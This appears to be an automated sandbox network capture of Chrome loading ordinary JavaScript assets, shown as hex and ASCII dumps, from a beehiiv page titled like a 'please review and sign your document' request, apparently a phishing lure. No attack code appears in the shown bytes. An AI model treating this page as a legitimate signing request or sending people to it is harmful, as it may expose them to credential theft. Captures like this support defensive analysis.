                                                                                                                                            2025-01-15 18:14:38 UTC1238INData Raw: 65 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 74 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 65 7d 2c 72 29 2c 61 3f 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 65 7d 2c 61 29 3a 6e 75 6c 6c 2c 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 39 20 34 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 20 31 20 2e 37 32 31 2e 35 34 34 6c 2e 38 31 33 20 32 2e 38 34 36 61 33 2e 37 35 20 33 2e 37 35 20 30 20 30 20 30 20 32 2e 35 37 36 20 32 2e 35 37 36 6c 32 2e 38 34 36 2e 38 31 33 61 2e 37 35 2e 37 35 20 30 20 30 20 31 20 30 20 31 2e 34 34 32 6c 2d 32 2e 38 34 36 2e 38 31
                                                                                                                                            Data Ascii: en":"true","data-slot":"icon",ref:t,"aria-labelledby":e},r),a?l.createElement("title",{id:e},a):null,l.createElement("path",{fillRule:"evenodd",d:"M9 4.5a.75.75 0 0 1 .721.544l.813 2.846a3.75 3.75 0 0 0 2.576 2.576l2.846.813a.75.75 0 0 1 0 1.442l-2.846.81


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            122192.168.2.1649849104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC550OUTGET /assets/index-IxBbnf-Q.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:38 UTC905INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:38 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 169070
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"2946e-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8bd391e4269-EWR
                                                                                                                                            2025-01-15 18:14:38 UTC464INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 65 62 61 30 35 65 66 62 2d 33 63 37 34 2d 35 65 36 36 2d 39 62 39 63 2d 35 32 39 65 61 38 62 38 38 39 37 30 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="eba05efb-3c74-5e66-9b9c-529ea8b88970")}catch(
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 66 74 3d 3d 3d 21 31 3f 22 22 3a 22 20 22 29 29 2e 74 72 69 6d 28 29 7d 63 6f 6e 73 74 20 56 69 3d 2f 5e 5b 24 5f 5c 70 7b 49 44 5f 53 74 61 72 74 7d 5d 5b 24 5f 5c 75 7b 32 30 30 43 7d 5c 75 7b 32 30 30 44 7d 5c 70 7b 49 44 5f 43 6f 6e 74 69 6e 75 65 7d 5d 2a 24 2f 75 2c 57 69 3d 2f 5e 5b 24 5f 5c 70 7b 49 44 5f 53 74 61 72 74 7d 5d 5b 2d 24 5f 5c 75 7b 32 30 30 43 7d 5c 75 7b 32 30 30 44 7d 5c 70 7b 49 44 5f 43 6f 6e 74 69 6e 75 65 7d 5d 2a 24 2f 75 2c 51 69 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 51 69 2e 6a 73 78 3f 57 69 3a 56 69 29 2e 74 65 73 74 28 65 29 7d 63 6f 6e 73 74 20 59 69 3d 2f 5b 20 5c 74 5c 6e 5c 66 5c 72 5d 2f 67 3b 66 75 6e 63 74 69 6f 6e 20 58 69 28 65 29 7b 72 65 74 75 72 6e 20 74 79 70 65
                                                                                                                                            Data Ascii: ft===!1?"":" ")).trim()}const Vi=/^[$_\p{ID_Start}][$_\u{200C}\u{200D}\p{ID_Continue}]*$/u,Wi=/^[$_\p{ID_Start}][-$_\u{200C}\u{200D}\p{ID_Continue}]*$/u,Qi={};function mt(e,t){return(Qi.jsx?Wi:Vi).test(e)}const Yi=/[ \t\n\f\r]/g;function Xi(e){return type
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 73 20 72 65 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 74 2c 6e 2c 72 2c 69 29 7b 6c 65 74 20 6c 3d 2d 31 3b 69 66 28 73 75 70 65 72 28 74 2c 6e 29 2c 64 74 28 74 68 69 73 2c 22 73 70 61 63 65 22 2c 69 29 2c 74 79 70 65 6f 66 20 72 3d 3d 22 6e 75 6d 62 65 72 22 29 66 6f 72 28 3b 2b 2b 6c 3c 6b 6e 2e 6c 65 6e 67 74 68 3b 29 7b 63 6f 6e 73 74 20 6f 3d 6b 6e 5b 6c 5d 3b 64 74 28 74 68 69 73 2c 6b 6e 5b 6c 5d 2c 28 72 26 76 6e 5b 6f 5d 29 3d 3d 3d 76 6e 5b 6f 5d 29 7d 7d 7d 57 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 66 69 6e 65 64 3d 21 30 3b 66 75 6e 63 74 69 6f 6e 20 64 74 28 65 2c 74 2c 6e 29 7b 6e 26 26 28 65 5b 74 5d 3d 6e 29 7d 63 6f 6e 73 74 20 4b 69 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 66 75 6e 63 74 69 6f 6e 20 4d 65 28 65 29 7b 63
                                                                                                                                            Data Ascii: s re{constructor(t,n,r,i){let l=-1;if(super(t,n),dt(this,"space",i),typeof r=="number")for(;++l<kn.length;){const o=kn[l];dt(this,kn[l],(r&vn[o])===vn[o])}}}Wn.prototype.defined=!0;function dt(e,t,n){n&&(e[t]=n)}const Ki={}.hasOwnProperty;function Me(e){c
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 2c 61 72 69 61 44 69 73 61 62 6c 65 64 3a 56 2c 61 72 69 61 44 72 6f 70 45 66 66 65 63 74 3a 48 2c 61 72 69 61 45 72 72 6f 72 4d 65 73 73 61 67 65 3a 6e 75 6c 6c 2c 61 72 69 61 45 78 70 61 6e 64 65 64 3a 56 2c 61 72 69 61 46 6c 6f 77 54 6f 3a 48 2c 61 72 69 61 47 72 61 62 62 65 64 3a 56 2c 61 72 69 61 48 61 73 50 6f 70 75 70 3a 6e 75 6c 6c 2c 61 72 69 61 48 69 64 64 65 6e 3a 56 2c 61 72 69 61 49 6e 76 61 6c 69 64 3a 6e 75 6c 6c 2c 61 72 69 61 4b 65 79 53 68 6f 72 74 63 75 74 73 3a 6e 75 6c 6c 2c 61 72 69 61 4c 61 62 65 6c 3a 6e 75 6c 6c 2c 61 72 69 61 4c 61 62 65 6c 6c 65 64 42 79 3a 48 2c 61 72 69 61 4c 65 76 65 6c 3a 43 2c 61 72 69 61 4c 69 76 65 3a 6e 75 6c 6c 2c 61 72 69 61 4d 6f 64 61 6c 3a 56 2c 61 72 69 61 4d 75 6c 74 69 4c 69 6e 65 3a 56 2c 61 72
                                                                                                                                            Data Ascii: ,ariaDisabled:V,ariaDropEffect:H,ariaErrorMessage:null,ariaExpanded:V,ariaFlowTo:H,ariaGrabbed:V,ariaHasPopup:null,ariaHidden:V,ariaInvalid:null,ariaKeyShortcuts:null,ariaLabel:null,ariaLabelledBy:H,ariaLevel:C,ariaLive:null,ariaModal:V,ariaMultiLine:V,ar
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 6f 72 6d 45 6e 63 54 79 70 65 3a 6e 75 6c 6c 2c 66 6f 72 6d 4d 65 74 68 6f 64 3a 6e 75 6c 6c 2c 66 6f 72 6d 4e 6f 56 61 6c 69 64 61 74 65 3a 4d 2c 66 6f 72 6d 54 61 72 67 65 74 3a 6e 75 6c 6c 2c 68 65 61 64 65 72 73 3a 48 2c 68 65 69 67 68 74 3a 43 2c 68 69 64 64 65 6e 3a 4d 2c 68 69 67 68 3a 43 2c 68 72 65 66 3a 6e 75 6c 6c 2c 68 72 65 66 4c 61 6e 67 3a 6e 75 6c 6c 2c 68 74 6d 6c 46 6f 72 3a 48 2c 68 74 74 70 45 71 75 69 76 3a 48 2c 69 64 3a 6e 75 6c 6c 2c 69 6d 61 67 65 53 69 7a 65 73 3a 6e 75 6c 6c 2c 69 6d 61 67 65 53 72 63 53 65 74 3a 6e 75 6c 6c 2c 69 6e 65 72 74 3a 4d 2c 69 6e 70 75 74 4d 6f 64 65 3a 6e 75 6c 6c 2c 69 6e 74 65 67 72 69 74 79 3a 6e 75 6c 6c 2c 69 73 3a 6e 75 6c 6c 2c 69 73 4d 61 70 3a 4d 2c 69 74 65 6d 49 64 3a 6e 75 6c 6c 2c 69 74
                                                                                                                                            Data Ascii: ormEncType:null,formMethod:null,formNoValidate:M,formTarget:null,headers:H,height:C,hidden:M,high:C,href:null,hrefLang:null,htmlFor:H,httpEquiv:H,id:null,imageSizes:null,imageSrcSet:null,inert:M,inputMode:null,integrity:null,is:null,isMap:M,itemId:null,it
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 73 65 4d 6f 76 65 3a 6e 75 6c 6c 2c 6f 6e 4d 6f 75 73 65 4f 75 74 3a 6e 75 6c 6c 2c 6f 6e 4d 6f 75 73 65 4f 76 65 72 3a 6e 75 6c 6c 2c 6f 6e 4d 6f 75 73 65 55 70 3a 6e 75 6c 6c 2c 6f 6e 4f 66 66 6c 69 6e 65 3a 6e 75 6c 6c 2c 6f 6e 4f 6e 6c 69 6e 65 3a 6e 75 6c 6c 2c 6f 6e 50 61 67 65 48 69 64 65 3a 6e 75 6c 6c 2c 6f 6e 50 61 67 65 53 68 6f 77 3a 6e 75 6c 6c 2c 6f 6e 50 61 73 74 65 3a 6e 75 6c 6c 2c 6f 6e 50 61 75 73 65 3a 6e 75 6c 6c 2c 6f 6e 50 6c 61 79 3a 6e 75 6c 6c 2c 6f 6e 50 6c 61 79 69 6e 67 3a 6e 75 6c 6c 2c 6f 6e 50 6f 70 53 74 61 74 65 3a 6e 75 6c 6c 2c 6f 6e 50 72 6f 67 72 65 73 73 3a 6e 75 6c 6c 2c 6f 6e 52 61 74 65 43 68 61 6e 67 65 3a 6e 75 6c 6c 2c 6f 6e 52 65 6a 65 63 74 69 6f 6e 48 61 6e 64 6c 65 64 3a 6e 75 6c 6c 2c 6f 6e 52 65 73 65 74
                                                                                                                                            Data Ascii: seMove:null,onMouseOut:null,onMouseOver:null,onMouseUp:null,onOffline:null,onOnline:null,onPageHide:null,onPageShow:null,onPaste:null,onPause:null,onPlay:null,onPlaying:null,onPopState:null,onProgress:null,onRateChange:null,onRejectionHandled:null,onReset
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 65 54 79 70 65 3a 6e 75 6c 6c 2c 63 6f 6c 6f 72 3a 6e 75 6c 6c 2c 63 6f 6d 70 61 63 74 3a 4d 2c 64 65 63 6c 61 72 65 3a 4d 2c 65 76 65 6e 74 3a 6e 75 6c 6c 2c 66 61 63 65 3a 6e 75 6c 6c 2c 66 72 61 6d 65 3a 6e 75 6c 6c 2c 66 72 61 6d 65 42 6f 72 64 65 72 3a 6e 75 6c 6c 2c 68 53 70 61 63 65 3a 43 2c 6c 65 66 74 4d 61 72 67 69 6e 3a 43 2c 6c 69 6e 6b 3a 6e 75 6c 6c 2c 6c 6f 6e 67 44 65 73 63 3a 6e 75 6c 6c 2c 6c 6f 77 53 72 63 3a 6e 75 6c 6c 2c 6d 61 72 67 69 6e 48 65 69 67 68 74 3a 43 2c 6d 61 72 67 69 6e 57 69 64 74 68 3a 43 2c 6e 6f 52 65 73 69 7a 65 3a 4d 2c 6e 6f 48 72 65 66 3a 4d 2c 6e 6f 53 68 61 64 65 3a 4d 2c 6e 6f 57 72 61 70 3a 4d 2c 6f 62 6a 65 63 74 3a 6e 75 6c 6c 2c 70 72 6f 66 69 6c 65 3a 6e 75 6c 6c 2c 70 72 6f 6d 70 74 3a 6e 75 6c 6c 2c 72
                                                                                                                                            Data Ascii: eType:null,color:null,compact:M,declare:M,event:null,face:null,frame:null,frameBorder:null,hSpace:C,leftMargin:C,link:null,longDesc:null,lowSrc:null,marginHeight:C,marginWidth:C,noResize:M,noHref:M,noShade:M,noWrap:M,object:null,profile:null,prompt:null,r
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 22 2c 66 6f 6e 74 57 65 69 67 68 74 3a 22 66 6f 6e 74 2d 77 65 69 67 68 74 22 2c 67 6c 79 70 68 4e 61 6d 65 3a 22 67 6c 79 70 68 2d 6e 61 6d 65 22 2c 67 6c 79 70 68 4f 72 69 65 6e 74 61 74 69 6f 6e 48 6f 72 69 7a 6f 6e 74 61 6c 3a 22 67 6c 79 70 68 2d 6f 72 69 65 6e 74 61 74 69 6f 6e 2d 68 6f 72 69 7a 6f 6e 74 61 6c 22 2c 67 6c 79 70 68 4f 72 69 65 6e 74 61 74 69 6f 6e 56 65 72 74 69 63 61 6c 3a 22 67 6c 79 70 68 2d 6f 72 69 65 6e 74 61 74 69 6f 6e 2d 76 65 72 74 69 63 61 6c 22 2c 68 72 65 66 4c 61 6e 67 3a 22 68 72 65 66 6c 61 6e 67 22 2c 68 6f 72 69 7a 41 64 76 58 3a 22 68 6f 72 69 7a 2d 61 64 76 2d 78 22 2c 68 6f 72 69 7a 4f 72 69 67 69 6e 58 3a 22 68 6f 72 69 7a 2d 6f 72 69 67 69 6e 2d 78 22 2c 68 6f 72 69 7a 4f 72 69 67 69 6e 59 3a 22 68 6f 72 69 7a
                                                                                                                                            Data Ascii: ",fontWeight:"font-weight",glyphName:"glyph-name",glyphOrientationHorizontal:"glyph-orientation-horizontal",glyphOrientationVertical:"glyph-orientation-vertical",hrefLang:"hreflang",horizAdvX:"horiz-adv-x",horizOriginX:"horiz-origin-x",horizOriginY:"horiz
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 6e 70 75 74 3a 22 6f 6e 69 6e 70 75 74 22 2c 6f 6e 49 6e 76 61 6c 69 64 3a 22 6f 6e 69 6e 76 61 6c 69 64 22 2c 6f 6e 4b 65 79 44 6f 77 6e 3a 22 6f 6e 6b 65 79 64 6f 77 6e 22 2c 6f 6e 4b 65 79 50 72 65 73 73 3a 22 6f 6e 6b 65 79 70 72 65 73 73 22 2c 6f 6e 4b 65 79 55 70 3a 22 6f 6e 6b 65 79 75 70 22 2c 6f 6e 4c 6f 61 64 3a 22 6f 6e 6c 6f 61 64 22 2c 6f 6e 4c 6f 61 64 65 64 44 61 74 61 3a 22 6f 6e 6c 6f 61 64 65 64 64 61 74 61 22 2c 6f 6e 4c 6f 61 64 65 64 4d 65 74 61 64 61 74 61 3a 22 6f 6e 6c 6f 61 64 65 64 6d 65 74 61 64 61 74 61 22 2c 6f 6e 4c 6f 61 64 53 74 61 72 74 3a 22 6f 6e 6c 6f 61 64 73 74 61 72 74 22 2c 6f 6e 4d 65 73 73 61 67 65 3a 22 6f 6e 6d 65 73 73 61 67 65 22 2c 6f 6e 4d 6f 75 73 65 44 6f 77 6e 3a 22 6f 6e 6d 6f 75 73 65 64 6f 77 6e 22 2c
                                                                                                                                            Data Ascii: nput:"oninput",onInvalid:"oninvalid",onKeyDown:"onkeydown",onKeyPress:"onkeypress",onKeyUp:"onkeyup",onLoad:"onload",onLoadedData:"onloadeddata",onLoadedMetadata:"onloadedmetadata",onLoadStart:"onloadstart",onMessage:"onmessage",onMouseDown:"onmousedown",
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 67 68 50 6f 73 69 74 69 6f 6e 3a 22 73 74 72 69 6b 65 74 68 72 6f 75 67 68 2d 70 6f 73 69 74 69 6f 6e 22 2c 73 74 72 69 6b 65 74 68 72 6f 75 67 68 54 68 69 63 6b 6e 65 73 73 3a 22 73 74 72 69 6b 65 74 68 72 6f 75 67 68 2d 74 68 69 63 6b 6e 65 73 73 22 2c 73 74 72 6f 6b 65 44 61 73 68 41 72 72 61 79 3a 22 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 22 2c 73 74 72 6f 6b 65 44 61 73 68 4f 66 66 73 65 74 3a 22 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 43 61 70 3a 22 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 4a 6f 69 6e 3a 22 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 22 2c 73 74 72 6f 6b 65 4d 69 74 65 72 4c 69 6d 69 74 3a 22 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69
                                                                                                                                            Data Ascii: ghPosition:"strikethrough-position",strikethroughThickness:"strikethrough-thickness",strokeDashArray:"stroke-dasharray",strokeDashOffset:"stroke-dashoffset",strokeLineCap:"stroke-linecap",strokeLineJoin:"stroke-linejoin",strokeMiterLimit:"stroke-miterlimi


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            123192.168.2.1649850104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC848OUTGET /assets/ArrowLeftIcon-Dz9QYxn0.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:38 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 856
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"358-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4165
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8bd6ff37cf4-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 34 35 66 38 61 30 66 65 2d 35 66 30 38 2d 35 31 39 61 2d 62 64 31 31 2d 37 39 64 30 39 31 32 34 34 38 32 34 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="45f8a0fe-5f08-519a-bd11-79d091244824")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC398INData Raw: 6b 65 57 69 64 74 68 3a 31 2e 35 2c 73 74 72 6f 6b 65 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 6e 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 74 7d 2c 6f 29 2c 72 3f 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 74 7d 2c 72 29 3a 6e 75 6c 6c 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 73 74 72 6f 6b 65 4c 69 6e 65 63 61 70 3a 22 72 6f 75 6e 64 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 6a 6f 69 6e 3a 22 72 6f 75 6e 64 22 2c 64 3a 22 4d 31 30 2e 35 20 31 39 2e 35 20 33 20 31 32 6d 30 20 30 20 37 2e 35 2d 37 2e 35 4d 33 20 31 32 68 31 38 22 7d 29
                                                                                                                                            Data Ascii: keWidth:1.5,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":t},o),r?e.createElement("title",{id:t},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"M10.5 19.5 3 12m0 0 7.5-7.5M3 12h18"})


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            124192.168.2.1649851104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC851OUTGET /assets/ChevronRightIcon-Dsmk2epM.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 849
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"351-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4166
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8bdbd0d1a1b-EWR
